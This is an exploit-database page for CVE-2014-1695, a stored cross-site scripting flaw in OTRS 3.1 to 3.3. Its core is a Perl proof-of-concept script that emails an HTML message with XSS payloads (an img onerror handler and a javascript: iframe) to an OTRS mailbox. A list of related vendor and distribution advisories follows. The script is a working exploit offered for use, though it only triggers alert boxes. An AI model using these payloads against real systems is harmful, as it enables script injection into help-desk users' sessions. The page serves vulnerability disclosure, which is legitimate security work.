Lucene search
Adam ZiajaEDB-ID:36842HistoryApr 27, 2015 - 12:00 a.m.
OTRS < 3.1.x / < 3.2.x / < 3.3.x - Persistent Cross-Site Scripting
2015-04-2700:00:00
Adam Ziaja
www.exploit-db.com
32
# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
# Date: 28.01.2014
# Exploit Author: Adam Ziaja http://adamziaja.com
# Vendor Homepage: https://www.otrs.com
# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
# CVE : CVE-2014-1695
#!/usr/bin/perl -w
use strict;
use MIME::Lite;
my $msg = MIME::Lite->new(
Subject => 'OTRS XSS PoC',
From => '[email protected]',
To => '[email protected]',
Type => 'text/html',
Data =>
'<html><body><img/onerror="alert(\'XSS1\')"src=a><iframe
src=javascript:alert(\'XSS2\') ></body></html>'
);
$msg->send();Related
securityvulns
securityvulns
[ MDVSA-2014:054 ] otrs
2014-05-05 00:00:00
nessus
nessus
Mandriva Linux Security Advisory : otrs (MDVSA-2014:054)
2014-03-14 00:00:00
openSUSE Security Update : otrs (openSUSE-SU-2014:0360-1)
2014-06-13 00:00:00
FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)
2014-02-26 00:00:00
mageia
mageia
Updated otrs package fixes security vulnerability
2014-03-03 00:58:54
prion
prion
Cross site scripting
2014-03-01 00:01:00
cve
cve
CVE-2014-1695
2014-03-01 00:01:00
packetstorm
packetstorm
OTRS 3.x Cross Site Scripting
2015-04-27 00:00:00
zdt
zdt
debiancve
debiancve
CVE-2014-1695
2014-03-01 00:01:00
freebsd
freebsd
otrs -- XSS Issue
2014-02-25 00:00:00
exploitpack
exploitpack
OTRS 3.1.x 3.2.x 3.3.x - Persistent Cross-Site Scripting
2015-04-27 00:00:00
ubuntucve
ubuntucve
CVE-2014-1695
2014-03-01 00:00:00
cvelist
cvelist
CVE-2014-1695
2014-02-28 17:00:00
openvas
openvas
OTRS Email HTML Injection Vulnerability (OSA-2014-03)
2014-03-04 00:00:00
Mageia: Security Advisory (MGASA-2014-0114)
2022-01-28 00:00:00
Debian: Security Advisory (DLA-1119-1)
2018-02-06 00:00:00
osv
osv
otrs2 - security update
2017-09-30 00:00:00
debian
debian
[SECURITY] [DLA 1119-1] otrs2 security update
2017-09-30 19:36:15